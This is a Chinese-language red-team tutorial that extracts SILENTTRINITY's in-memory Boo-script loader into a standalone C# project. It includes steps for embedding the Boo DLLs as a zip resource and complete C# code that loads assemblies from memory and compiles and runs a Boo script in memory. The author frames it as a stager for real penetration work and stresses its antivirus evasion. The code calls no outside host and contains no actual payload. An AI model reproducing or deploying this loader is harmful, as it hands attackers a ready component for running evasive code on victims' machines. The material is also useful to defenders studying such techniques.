在ST类的ResolveEventHandler方法中会加载传入的dll,第二点就是怎么把dll带进去,它是作为一个stager的过程将那四个dll打包成zip文件传过去。在实际的红队渗透中不涉及C2的话咱们可以完全把这个功能单独提取出来用,好处就是在免杀效果上有非常不错的表现。咱们先把它单独提取出来演示一下,后面再来慢慢组装C2
使用C#内存加载运行Boolang新建一个名为BooTest的C#项目
然后将ZIP包的DLL资源嵌入到项目中,DLL资源从https://github.com/boo-lang/boo获取
除SILENTTRINITY使用的四个DLL外,其实还有一个扩展方法,需要用到另外一个DLL,咱们就一起打包了
打包后右键添加文件夹改名为Resources
右键文件夹添加现有项
选择所有文件并引入打包好的Boo.zip
将生成操作改为嵌入的资源,点击保存后成功的将资源嵌入。
再添加zip操作类,代码位于https://github.com/jaime-olivares/zipstorer/blob/master/src/ZipStorer.cs
右键项目>添加>新建项,新建ZipStorer类然后将代码Copy过来,关于Boolang的语法在GitHub的wiki上有写,有兴趣的可以去看看。
然后将ST类的的ResolveEventHandler函数和RunBooEngine函数Copy过来,和它用到的方法一起Copy过来,最后将其进行整理。
using Boo.Lang.Compiler; using Boo.Lang.Compiler.IO; using Boo.Lang.Compiler.Pipelines; using System; using System.Collections.Generic; using System.IO; using System.IO.Compression; using System.Linq; using System.Reflection; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; namespace BooTest { class Program { private static ZipStorer _boozip = ZipStorer.Open(new MemoryStream(GetResourceAsbytes("Boo.zip")), FileAccess.ReadWrite, true); public static string GetDllName(string name) { var dllName = name + ".dll"; if (name.IndexOf(',') > 0) { dllName = name.Substring(0, name.IndexOf(',')) + ".dll"; } return dllName; } public static string GetResourceFullName(string resName) => Assembly.GetExecutingAssembly().GetManifestResourceNames().FirstOrDefault(x => x.EndsWith(resName)); internal static byte[] GetResourceAsbytes(string resName) { using (var resourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(GetResourceFullName(resName))) { using (var memoryStream = new MemoryStream()) { resourceStream?.CopyTo(memoryStream); return memoryStream.ToArray(); } } } //获取boo脚本源码 public static string GetResourceAsString(string resName) { string _content = null; using (Stream _stream = Assembly.GetExecutingAssembly().GetManifestResourceStream(GetResourceFullName(resName))) { using (StreamReader _txtreader = new StreamReader(_stream)) { _content = _txtreader.ReadToEnd(); } } return _content; } public static byte[] GetResourceFromZip(ZipStorer zip, string name) { foreach (var entry in zip.ReadCentralDir()) { if (entry.FilenameInZip != name) continue; zip.ExtractFile(entry, out var data); return data; } return default; } private static Assembly ResolveEventHandler(object sender, ResolveEventArgs args) { var dllName = GetDllName(args.Name); //分割参数返回dll名 Console.WriteLine($"Loading missing dll :{dllName}"); //查看每次加载的dll byte[] bytes; bytes = GetResourceFromZip(_boozip, dllName) ?? File.ReadAllBytes(RuntimeEnvironment.GetRuntimeDirectory() + dllName); return Assembly.Load(bytes); } //解析执行Boo脚本 public static void RunBooEngine(string name,string source) { Console.WriteLine("\n[*] Compiling Stage Code"); CompilerParameters parameters = new CompilerParameters(false); parameters.Input.Add(new StringInput(name, source)); parameters.Pipeline = new CompileToMemory(); parameters.Ducky = true; parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang")); parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Extensions")); parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Parser")); parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Compiler")); parameters.AddAssembly(Assembly.LoadWithPartialName("mscorlib")); parameters.AddAssembly(Assembly.LoadWithPartialName("System")); parameters.AddAssembly(Assembly.LoadWithPartialName("System.Core")); parameters.AddAssembly(Assembly.LoadWithPartialName("System.Web.Extensions")); //Console.WriteLine(compiler.Parameters.LibPaths); //compiler.Parameters.LoadAssembly("System"); BooCompiler compiler = new BooCompiler(parameters); CompilerContext context = compiler.Run(); //Note that the following code might throw an error if the Boo script had bugs. //Poke context.Errors to make sure. if (context.GeneratedAssembly != null) { Console.WriteLine("[+] Compilation Successful!"); Console.WriteLine("[*] Executing"); //AppDomain.CurrentDomain.AssemblyResolve -= ResolveEventHandler; context.GeneratedAssembly.EntryPoint.Invoke(null, new object[] { null }); } else { Console.WriteLine("[-] Error(s) compiling script, this probably means your Boo script has bugs\n"); foreach (CompilerError error in context.Errors) Console.WriteLine(error); } } static void Main(string[] args) { } } }RunBooEngine是用来解析执行boo脚本的,但是他在执行的时候需要引用boo的一些库函数,我们将boo的几个类型引入进来